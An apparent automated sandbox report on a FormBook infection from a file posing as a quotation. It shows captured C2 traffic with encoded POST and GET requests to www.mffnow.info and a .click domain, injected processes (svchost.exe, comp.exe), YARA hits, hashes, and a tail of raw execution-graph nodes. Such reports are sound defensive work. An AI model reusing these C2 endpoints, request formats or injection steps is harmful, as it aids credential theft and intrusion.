                                                                    Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 61 74 61 2d 61 64 62 6c 6f 63 6b 6b 65 79 3d 22 4d 46 77 77 44 51 59 4a 4b 6f 5a 49 68 76 63 4e 41 51 45 42 42 51 41 44 53 77 41 77 53 41 4a 42 41 4e 44 72 70 32 6c 7a 37 41 4f 6d 41 44 61 4e 38 74 41 35 30 4c 73 57 63 6a 4c 46 79 51 46 63 62 2f 50 32 54 78 63 35 38 6f 59 4f 65 49 4c 62 33 76 42 77 37 4a 36 66 34 70 61 6d 6b 41 51 56 53 51 75 71 59 73 4b 78 33 59 7a 64 55 48 43 76 62 56 5a 76 46 55 73 43 41 77 45 41 41 51 3d 3d 5f 50 6a 7a 2b 4f 41 4b 47 35 2b 48 59 6a 51 33 43 6b 7a 45 6d 69 64 6e 76 6d 7a 54 61 31 75 53 6f 37 52 6f 30 59 52 67 43 39 65 54 34 65 74 66 4e 4e 48 4f 48 58 39 61 2b 36 7a 74 50 36 7a 2b 2f 45 4d 61 52 75 71 35 2b 53 36 6a 42 2b 66 39 2b 46 6b 4a 61 4f 67 3d 3d 22 20 6c 61 6e 67 3d 22 65 6e 22 20 73 74 79 6c 65 3d 22 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 32 42 32 42 32 42 3b 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d [TRUNCATED]
                                                                    Data Ascii: <!doctype html><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_Pjz+OAKG5+HYjQ3CkzEmidnvmzTa1uSo7Ro0YRgC9eT4etfNNHOHX9a+6ztP6z+/EMaRuq5+S6jB+f9+FkJaOg==" lang="en" style="background: #2B2B2B;"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="icon" href="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAIAAACQd1PeAAAADElEQVQI12P4//8/AAX+Av7czFnnAAAAAElFTkSuQmCC"
Dec 6, 2024 10:07:13.738439083 CET | 955 | IN | Data Raw: 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 63 6f 6e 6e 65 63 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62
                                                                    Data Ascii: > <link rel="preconnect" href="https://www.google.com" crossorigin></head><body><div id="target" style="opacity: 0"></div><script>window.park = "eyJ1dWlkIjoiMDk2MTE3NmEtNTQ4Ny00MTcxLTg1OTEtYWM2NjM1OWI5MjZkIiwicGFnZV90aW1lIjoxNzMzNDc2MD


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
25 | 192.168.2.6 | 50036 | 172.67.178.93 | 80 | 5000 | C:\Program Files (x86)\EEfvjwkOcTTrJsNQsNlPWOoCOGZrgqvjbWYDuyrfYdYDGeaMmKfMG\FOBNeEFwBsF.exe
Timestamp | Bytes transferred | Direction | Data
Dec 6, 2024 10:07:19.381354094 CET | 851 | OUT | POST /0pqe/ HTTP/1.1
                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                    Accept-Encoding: gzip, deflate, br
                                                                    Accept-Language: en-US,en;q=0.5
                                                                    Host: www.mffnow.info
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Connection: close
                                                                    Content-Length: 208
                                                                    Cache-Control: no-cache
                                                                    Origin: http://www.mffnow.info
                                                                    Referer: http://www.mffnow.info/0pqe/
                                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; Local IDS7)
                                                                    Data Raw: 4b 78 5a 3d 58 4c 77 69 65 59 2b 61 74 38 6d 37 65 72 33 70 43 67 4d 34 72 78 71 71 6d 73 52 49 2f 59 75 77 65 44 62 37 72 5a 47 34 41 32 65 7a 42 4e 73 4e 36 33 43 4c 30 65 35 59 39 45 64 75 55 5a 6d 74 4c 6b 44 69 74 31 41 52 4d 61 52 41 76 50 44 33 4e 52 54 69 5a 6e 4b 61 50 51 34 50 73 49 72 4c 33 70 39 71 67 61 7a 30 43 49 74 44 7a 52 76 61 4e 64 43 45 46 33 61 6e 73 58 76 6b 62 46 79 47 53 49 5a 74 66 38 53 57 71 4b 4d 6b 37 4c 49 79 69 30 47 61 71 49 67 77 62 6b 65 62 2b 75 62 52 68 59 63 2b 6a 33 2b 2b 6f 37 66 79 6a 4d 70 78 72 6b 49 58 2b 4c 37 4b 74 64 39 43 45 2b 43 73 37 38 62 65 66 43 58 74 4f 6f 54 6f
                                                                    Data Ascii: KxZ=XLwieY+at8m7er3pCgM4rxqqmsRI/YuweDb7rZG4A2ezBNsN63CL0e5Y9EduUZmtLkDit1ARMaRAvPD3NRTiZnKaPQ4PsIrL3p9qgaz0CItDzRvaNdCEF3ansXvkbFyGSIZtf8SWqKMk7LIyi0GaqIgwbkeb+ubRhYc+j3++o7fyjMpxrkIX+L7Ktd9CE+Cs78befCXtOoTo


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
26 | 192.168.2.6 | 50037 | 172.67.178.93 | 80 | 5000 | C:\Program Files (x86)\EEfvjwkOcTTrJsNQsNlPWOoCOGZrgqvjbWYDuyrfYdYDGeaMmKfMG\FOBNeEFwBsF.exe
Timestamp | Bytes transferred | Direction | Data
Dec 6, 2024 10:07:22.047568083 CET | 875 | OUT | POST /0pqe/ HTTP/1.1
                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                    Accept-Encoding: gzip, deflate, br
                                                                    Accept-Language: en-US,en;q=0.5
                                                                    Host: www.mffnow.info
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Connection: close
                                                                    Content-Length: 232
                                                                    Cache-Control: no-cache
                                                                    Origin: http://www.mffnow.info
                                                                    Referer: http://www.mffnow.info/0pqe/
                                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; Local IDS7)
                                                                    Data Raw: 4b 78 5a 3d 58 4c 77 69 65 59 2b 61 74 38 6d 37 66 4c 6e 70 52 52 4d 34 6a 78 71 72 2f 63 52 49 32 34 75 38 65 44 48 37 72 59 79 6f 41 44 32 7a 50 50 6b 4e 31 53 2b 4c 34 2b 35 59 33 6b 64 76 4a 70 6d 32 4c 6b 4f 64 74 31 38 52 4d 5a 74 41 76 4c 48 33 4d 69 72 6a 59 33 4b 50 4a 51 34 42 6a 6f 72 4c 33 70 39 71 67 61 33 4b 43 49 46 44 7a 69 33 61 4e 38 43 46 5a 6e 61 6b 6c 33 76 6b 4e 31 79 4b 53 49 5a 50 66 39 4f 6f 71 49 30 6b 37 4c 34 79 69 67 71 64 78 59 68 35 45 30 66 34 2f 2b 36 4b 6e 6f 52 78 6a 42 2b 2b 2f 35 2f 69 72 61 30 72 33 58 49 30 73 62 62 49 74 66 6c 77 45 65 43 47 35 38 6a 65 4e 56 62 4b 42 63 32 4c 31 78 32 36 65 6e 46 73 73 72 31 6c 37 38 66 70 59 78 2b 76 51 41 3d 3d
                                                                    Data Ascii: KxZ=XLwieY+at8m7fLnpRRM4jxqr/cRI24u8eDH7rYyoAD2zPPkN1S+L4+5Y3kdvJpm2LkOdt18RMZtAvLH3MirjY3KPJQ4BjorL3p9qga3KCIFDzi3aN8CFZnakl3vkN1yKSIZPf9OoqI0k7L4yigqdxYh5E0f4/+6KnoRxjB++/5/ira0r3XI0sbbItflwEeCG58jeNVbKBc2L1x26enFssr1l78fpYx+vQA==


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
27 | 192.168.2.6 | 50038 | 172.67.178.93 | 80 | 5000 | C:\Program Files (x86)\EEfvjwkOcTTrJsNQsNlPWOoCOGZrgqvjbWYDuyrfYdYDGeaMmKfMG\FOBNeEFwBsF.exe

Timestamp | Bytes transferred | Direction | Data
Dec 6, 2024 10:07:24.704016924 CET | 1888 | OUT | POST /0pqe/ HTTP/1.1
                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                    Accept-Encoding: gzip, deflate, br
                                                                    Accept-Language: en-US,en;q=0.5
                                                                    Host: www.mffnow.info
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Connection: close
                                                                    Content-Length: 1244
                                                                    Cache-Control: no-cache
                                                                    Origin: http://www.mffnow.info
                                                                    Referer: http://www.mffnow.info/0pqe/
                                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; Local IDS7)
Data Ascii: KxZ=[TRUNCATED]


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
28 | 192.168.2.6 | 50039 | 172.67.178.93 | 80 | 5000 | C:\Program Files (x86)\EEfvjwkOcTTrJsNQsNlPWOoCOGZrgqvjbWYDuyrfYdYDGeaMmKfMG\FOBNeEFwBsF.exe

Timestamp | Bytes transferred | Direction | Data
Dec 6, 2024 10:07:27.356547117 CET | 591 | OUT | GET /0pqe/?KxZ=aJYCdvvPx+uKS5Ogd0A7vBDK6OZ68qCTbFX0p5fCFhilae8HyBK0z8Ue4klxYsqgBES9oGplOKNa3q3+NTywUHb6Ky4Osqfr3aB0kL6LN4sT6D7TOK7CTnegghrlX225G7BgQJc=&T2M=Y0Z0G HTTP/1.1
                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                    Accept-Language: en-US,en;q=0.5
                                                                    Host: www.mffnow.info
                                                                    Connection: close
                                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; Local IDS7)
Dec 6, 2024 10:07:29.653884888 CET | 754 | IN | HTTP/1.1 567 unknown
                                                                    Date: Fri, 06 Dec 2024 09:07:29 GMT
                                                                    Content-Length: 17
                                                                    Connection: close
                                                                    CF-Cache-Status: DYNAMIC
                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=BAlKFIlGxR2a6e6HS%2FpmL9vNybpdZKBcXY95ZWGf2%2F4%2FOn4CvWf23dz0g9d%2BHlXjGtwjS1FQDQNp5W1QInOrwNsp04hVhal2IH79ggofvw7U8TGK7OOpZ3Lu2LVu0o%2BUm30%3D"}],"group":"cf-nel","max_age":604800}
                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                    Server: cloudflare
                                                                    CF-RAY: 8edb2035bebc42ab-EWR
                                                                    alt-svc: h3=":443"; ma=86400
                                                                    server-timing: cfL4;desc="?proto=TCP&rtt=1876&min_rtt=1876&rtt_var=938&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=591&delivery_rate=0&cwnd=197&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                    Data Raw: 52 65 71 75 65 73 74 20 74 6f 6f 20 6c 61 72 67 65
                                                                    Data Ascii: Request too large


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
29 | 192.168.2.6 | 50040 | 172.67.192.207 | 80 | 5000 | C:\Program Files (x86)\EEfvjwkOcTTrJsNQsNlPWOoCOGZrgqvjbWYDuyrfYdYDGeaMmKfMG\FOBNeEFwBsF.exe

Timestamp | Bytes transferred | Direction | Data
Dec 6, 2024 10:07:35.140233040 CET | 881 | OUT | POST /yy0e/ HTTP/1.1
                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                    Accept-Encoding: gzip, deflate, br
                                                                    Accept-Language: en-US,en;q=0.5
                                                                    Host: www.3kw40881107247y.click
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Connection: close
                                                                    Content-Length: 208
                                                                    Cache-Control: no-cache
                                                                    Origin: http://www.3kw40881107247y.click
                                                                    Referer: http://www.3kw40881107247y.click/yy0e/
                                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; Local IDS7)
                                                                    Data Ascii: KxZ=mobh+nLy1LdJ8062UvD5QkzfVafUMYOllaAsObbvVoqBxYBLrzhDX8ghB4YK6U3SYPqv53YneV/Y/xxw8ztViv2dlDD276oKcT/JG8CEWC8QAfznTZxQnU950bZJKXe9LLGiSNGCMBb/dAzqRmVatoSvOFq8NntgZTlIma8hXcRjI/B93a/OSiEEQXlxnFXttHldjCO4i4pt
Dec 6, 2024 10:07:36.228521109 CET | 978 | IN | HTTP/1.1 404 Not Found
                                                                    Date: Fri, 06 Dec 2024 09:07:36 GMT
                                                                    Content-Type: text/html
                                                                    Transfer-Encoding: chunked
                                                                    Connection: close
                                                                    CF-Cache-Status: DYNAMIC
                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=rK8BUbrzb1SFW40gXkWsE2SjUE3Qf3e157hApvmONvKoMcgP9T%2FgdF%2BpyJe9NklnKusebH8fQRImm85ut3pRFgw76lL0yuz5auTJfSZ22FPbSS1iAwFhxBB4RKJmtbdWu7N7z2Wi2SBbLCwo"}],"group":"cf-nel","max_age":604800}
                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                    Server: cloudflare
                                                                    CF-RAY: 8edb2066480442d7-EWR
                                                                    Content-Encoding: gzip
                                                                    alt-svc: h3=":443"; ma=86400
                                                                    server-timing: cfL4;desc="?proto=TCP&rtt=1861&min_rtt=1861&rtt_var=930&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=881&delivery_rate=0&cwnd=241&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
30 | 192.168.2.6 | 50041 | 172.67.192.207 | 80 | 5000 | C:\Program Files (x86)\EEfvjwkOcTTrJsNQsNlPWOoCOGZrgqvjbWYDuyrfYdYDGeaMmKfMG\FOBNeEFwBsF.exe

Timestamp | Bytes transferred | Direction | Data
Dec 6, 2024 10:07:37.799776077 CET | 905 | OUT | POST /yy0e/ HTTP/1.1
                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                    Accept-Encoding: gzip, deflate, br
                                                                    Accept-Language: en-US,en;q=0.5
                                                                    Host: www.3kw40881107247y.click
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Connection: close
                                                                    Content-Length: 232
                                                                    Cache-Control: no-cache
                                                                    Origin: http://www.3kw40881107247y.click
                                                                    Referer: http://www.3kw40881107247y.click/yy0e/
                                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; Local IDS7)
                                                                    Data Ascii: KxZ=mobh+nLy1LdJtlK2WOD5XEzcRqfUXoOhlacsOafGVa+Bx5RLs3NDU8ghOYYD+U3ZYPmR5zYneUfY/wBw8CtWj/2fjDD0kKoKcT/JG//hWGQQArPnBoxRt096xbZJOXeHLLGQSODlMDz/dEjqS3VV04ShRVrCN3oQAhQ44ZQ6D/NTEpcnrp/tAykGQV9DnlXHvHddxVCftMMOkQbn73GVMHwWf8oSKm0r6w==
Dec 6, 2024 10:07:38.894279003 CET | 976 | IN | HTTP/1.1 404 Not Found
                                                                    Date: Fri, 06 Dec 2024 09:07:38 GMT
                                                                    Content-Type: text/html
                                                                    Transfer-Encoding: chunked
                                                                    Connection: close
                                                                    CF-Cache-Status: DYNAMIC
                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=LmwbRBaAFWGVZYx9Q6BWA0PYMrYO97fBtKTafVdPpZAaLEaigdIk9LF71w%2FmHUDWm6Ok1W023j3wqb73dX3qD1On28h18CwTPeTItKwYX4IRkMHYl4eMTiaSMq7KKKME04Li3b71qsyLdOFm"}],"group":"cf-nel","max_age":604800}
                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                    Server: cloudflare
                                                                    CF-RAY: 8edb2076f9b0c333-EWR
                                                                    Content-Encoding: gzip
                                                                    alt-svc: h3=":443"; ma=86400
                                                                    server-timing: cfL4;desc="?proto=TCP&rtt=1506&min_rtt=1506&rtt_var=753&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=905&delivery_rate=0&cwnd=141&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"



                                                                    Target ID:0
                                                                    Start time:04:04:30
                                                                    Start date:06/12/2024
                                                                    Path:C:\Users\user\Desktop\QUOTATON-37839993.exe
                                                                    Wow64 process (32bit):true
                                                                    Commandline:"C:\Users\user\Desktop\QUOTATON-37839993.exe"
                                                                    Imagebase:0xe00000
                                                                    File size:1'226'240 bytes
                                                                    MD5 hash:4FFF9AD3CCF6625DC0287E4BA41F0184
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language
                                                                    Reputation:low
                                                                    Has exited:true

                                                                    Target ID:4
                                                                    Start time:04:04:34
                                                                    Start date:06/12/2024
                                                                    Path:C:\Windows\SysWOW64\svchost.exe
                                                                    Wow64 process (32bit):true
                                                                    Commandline:"C:\Users\user\Desktop\QUOTATON-37839993.exe"
                                                                    Imagebase:0x60000
                                                                    File size:46'504 bytes
                                                                    MD5 hash:1ED18311E3DA35942DB37D15FA40CC5B
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language
                                                                    Yara matches:
                                                                    • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000004.00000002.2589543027.0000000002640000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                    • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000004.00000002.2590876860.0000000005120000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                    • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000004.00000002.2590442326.0000000003490000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                    Reputation:high
                                                                    Has exited:true

                                                                    Target ID:12
                                                                    Start time:04:05:07
                                                                    Start date:06/12/2024
                                                                    Path:C:\Program Files (x86)\EEfvjwkOcTTrJsNQsNlPWOoCOGZrgqvjbWYDuyrfYdYDGeaMmKfMG\FOBNeEFwBsF.exe
                                                                    Wow64 process (32bit):true
                                                                    Commandline:"C:\Program Files (x86)\EEfvjwkOcTTrJsNQsNlPWOoCOGZrgqvjbWYDuyrfYdYDGeaMmKfMG\FOBNeEFwBsF.exe"
                                                                    Imagebase:0x230000
                                                                    File size:140'800 bytes
                                                                    MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                                    Has elevated privileges:false
                                                                    Has administrator privileges:false
                                                                    Programmed in:C, C++ or other language
                                                                    Yara matches:
                                                                    • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000000C.00000002.4008647896.0000000002CC0000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                                                                    Reputation:high
                                                                    Has exited:false

                                                                    Target ID:13
                                                                    Start time:04:05:09
                                                                    Start date:06/12/2024
                                                                    Path:C:\Windows\SysWOW64\comp.exe
                                                                    Wow64 process (32bit):true
                                                                    Commandline:"C:\Windows\SysWOW64\comp.exe"
                                                                    Imagebase:0x650000
                                                                    File size:23'552 bytes
                                                                    MD5 hash:712EF348F7032AA1C80D24600BA5452D
                                                                    Has elevated privileges:false
                                                                    Has administrator privileges:false
                                                                    Programmed in:C, C++ or other language
                                                                    Yara matches:
                                                                    • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000000D.00000002.4007316653.0000000002E60000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                    • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000000D.00000002.4008699192.0000000003320000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                    • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000000D.00000002.4008790036.0000000003390000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                    Reputation:moderate
                                                                    Has exited:false

                                                                    Target ID:14
                                                                    Start time:04:05:22
                                                                    Start date:06/12/2024
                                                                    Path:C:\Program Files (x86)\EEfvjwkOcTTrJsNQsNlPWOoCOGZrgqvjbWYDuyrfYdYDGeaMmKfMG\FOBNeEFwBsF.exe
                                                                    Wow64 process (32bit):true
                                                                    Commandline:"C:\Program Files (x86)\EEfvjwkOcTTrJsNQsNlPWOoCOGZrgqvjbWYDuyrfYdYDGeaMmKfMG\FOBNeEFwBsF.exe"
                                                                    Imagebase:0x230000
                                                                    File size:140'800 bytes
                                                                    MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                                    Has elevated privileges:false
                                                                    Has administrator privileges:false
                                                                    Programmed in:C, C++ or other language
                                                                    Yara matches:
                                                                    • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000000E.00000002.4010692987.0000000004E90000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                    Reputation:high
                                                                    Has exited:false

                                                                    Target ID:15
                                                                    Start time:04:05:34
                                                                    Start date:06/12/2024
                                                                    Path:C:\Program Files\Mozilla Firefox\firefox.exe
                                                                    Wow64 process (32bit):false
                                                                    Commandline:"C:\Program Files\Mozilla Firefox\Firefox.exe"
                                                                    Imagebase:0x7ff728280000
                                                                    File size:676'768 bytes
                                                                    MD5 hash:C86B1BE9ED6496FE0E0CBE73F81D8045
                                                                    Has elevated privileges:false
                                                                    Has administrator privileges:false
                                                                    Programmed in:C, C++ or other language
                                                                    Reputation:high
                                                                    Has exited:true


                                                                      Execution Graph

                                                                      Execution Coverage:3.7%
                                                                      Dynamic/Decrypted Code Coverage:1.3%
                                                                      Signature Coverage:8.7%
                                                                      Total number of Nodes:2000
                                                                      Total number of Limit Nodes:62
e10ef1 104542->104544 104733 e11093 331 API calls Mailbox 104544->104733 104545 e10a4b PeekMessageW 104608 e10a05 Mailbox 104545->104608 104547 e10ef8 LockWindowUpdate DestroyWindow GetMessageW 104547->104540 104551 e10f2a 104547->104551 104549->104608 104736 e09e5d 60 API calls 104549->104736 104737 e56349 331 API calls 104549->104737 104550 e44e81 Sleep 104550->104608 104554 e45c58 TranslateMessage DispatchMessageW GetMessageW 104551->104554 104552 e10ce4 104552->104540 104732 e11070 10 API calls Mailbox 104552->104732 104554->104554 104555 e45c88 104554->104555 104555->104540 104556 e10e43 PeekMessageW 104556->104608 104557 e10ea5 TranslateMessage DispatchMessageW 104557->104556 104558 e44d50 TranslateAcceleratorW 104558->104556 104558->104608 104559 e10d13 timeGetTime 104559->104608 104560 e4581f WaitForSingleObject 104563 e4583c GetExitCodeProcess CloseHandle 104560->104563 104560->104608 104595 e10f95 104563->104595 104564 e10e5f Sleep 104598 e10e70 Mailbox 104564->104598 104565 e08047 59 API calls 104565->104608 104566 e45af8 Sleep 104566->104598 104568 e20db6 59 API calls Mailbox 104568->104608 104570 e2049f timeGetTime 104570->104598 104571 e10f4e timeGetTime 104734 e09e5d 60 API calls 104571->104734 104574 e45b8f GetExitCodeProcess 104578 e45ba5 WaitForSingleObject 104574->104578 104579 e45bbb CloseHandle 104574->104579 104576 e85f25 110 API calls 104576->104598 104577 e0b7dd 109 API calls 104577->104598 104578->104579 104578->104608 104579->104598 104582 e45874 104582->104595 104583 e45078 Sleep 104583->104608 104584 e45c17 Sleep 104584->104608 104589 e09e5d 60 API calls 104589->104608 104593 e0fce0 304 API calls 104593->104608 104595->104449 104597 e07de1 59 API calls 104597->104608 104598->104570 104598->104574 104598->104576 104598->104577 104598->104582 104598->104583 104598->104584 104598->104595 104598->104608 104762 e07667 104598->104762 104767 e62408 60 API calls 104598->104767 104768 e09e5d 60 API calls 104598->104768 104769 e07de1 
104598->104769 104773 e089b3 69 API calls Mailbox 104598->104773 104774 e0b73c 331 API calls 104598->104774 104775 e564da 60 API calls 104598->104775 104776 e65244 QueryPerformanceCounter QueryPerformanceFrequency Sleep QueryPerformanceCounter Sleep 104598->104776 104777 e63c55 66 API calls Mailbox 104598->104777 104600 e69e4a 89 API calls 104600->104608 104601 e09c90 59 API calls Mailbox 104601->104608 104602 e0b73c 304 API calls 104602->104608 104603 e09ea0 304 API calls 104603->104608 104604 e084c0 69 API calls 104604->104608 104606 e5617e 59 API calls Mailbox 104606->104608 104607 e089b3 69 API calls 104607->104608 104608->104545 104608->104550 104608->104552 104608->104556 104608->104557 104608->104558 104608->104559 104608->104560 104608->104564 104608->104565 104608->104566 104608->104568 104608->104571 104608->104589 104608->104593 104608->104595 104608->104597 104608->104598 104608->104600 104608->104601 104608->104602 104608->104603 104608->104604 104608->104606 104608->104607 104609 e455d5 VariantClear 104608->104609 104610 e4566b VariantClear 104608->104610 104611 e45419 VariantClear 104608->104611 104612 e08cd4 59 API calls Mailbox 104608->104612 104613 e56e8f 59 API calls 104608->104613 104676 e0e6a0 104608->104676 104707 e0f460 104608->104707 104726 e031ce 104608->104726 104731 e0e420 331 API calls 104608->104731 104738 e86018 59 API calls 104608->104738 104739 e69a15 59 API calls Mailbox 104608->104739 104740 e5d4f2 59 API calls 104608->104740 104741 e09837 104608->104741 104759 e560ef 59 API calls 2 library calls 104608->104759 104760 e08401 59 API calls 104608->104760 104761 e082df 59 API calls Mailbox 104608->104761 104609->104608 104610->104608 104611->104608 104612->104608 104613->104608 104614->104471 104615->104476 104616->104472 104617->104472 104619 e09ebf 104618->104619 104637 e09eed Mailbox 104618->104637 104620 e20db6 Mailbox 59 API calls 104619->104620 104620->104637 104621 e22d40 67 API calls __cinit 104621->104637 104622 e0b475 104623 
e08047 59 API calls 104622->104623 104631 e0a057 104623->104631 104624 e0b47a 104626 e409e5 104624->104626 104627 e40055 104624->104627 104625 e20db6 59 API calls Mailbox 104625->104637 105871 e69e4a 89 API calls 4 library calls 104626->105871 105868 e69e4a 89 API calls 4 library calls 104627->105868 104631->104423 104632 e40064 104632->104423 104634 e08047 59 API calls 104634->104637 104635 e07667 59 API calls 104635->104637 104637->104621 104637->104622 104637->104624 104637->104625 104637->104627 104637->104631 104637->104634 104637->104635 104638 e56e8f 59 API calls 104637->104638 104639 e409d6 104637->104639 104641 e0a55a 104637->104641 105851 e0b900 104637->105851 105867 e0c8c0 331 API calls 2 library calls 104637->105867 104638->104637 105870 e69e4a 89 API calls 4 library calls 104639->105870 105869 e69e4a 89 API calls 4 library calls 104641->105869 104642->104476 104643->104402 104644->104456 104645->104412 104646->104456 104647->104456 104648->104414 104649->104425 104650->104426 104651->104426 104652->104428 104653->104432 104654->104472 104655->104472 104656->104472 104657->104472 104659 e084cb 104658->104659 104661 e084f2 104659->104661 105877 e089b3 69 API calls Mailbox 104659->105877 104661->104454 104662->104456 104663->104447 104665 e08052 104664->104665 104666 e0805a 104664->104666 105878 e07f77 59 API calls 2 library calls 104665->105878 104666->104462 104668->104408 104669->104456 104671 e07e62 104670->104671 104673 e07e5f _memmove 104670->104673 104672 e20db6 Mailbox 59 API calls 104671->104672 104672->104673 104673->104524 104674->104529 104675->104535 104677 e0e6d5 104676->104677 104678 e43aa9 104677->104678 104681 e0e73f 104677->104681 104691 e0e799 104677->104691 104679 e09ea0 331 API calls 104678->104679 104680 e43abe 104679->104680 104706 e0e970 Mailbox 104680->104706 104779 e69e4a 89 API calls 4 library calls 104680->104779 104684 e07667 59 API calls 104681->104684 104681->104691 104682 e07667 59 API calls 104682->104691 104685 e43b04 
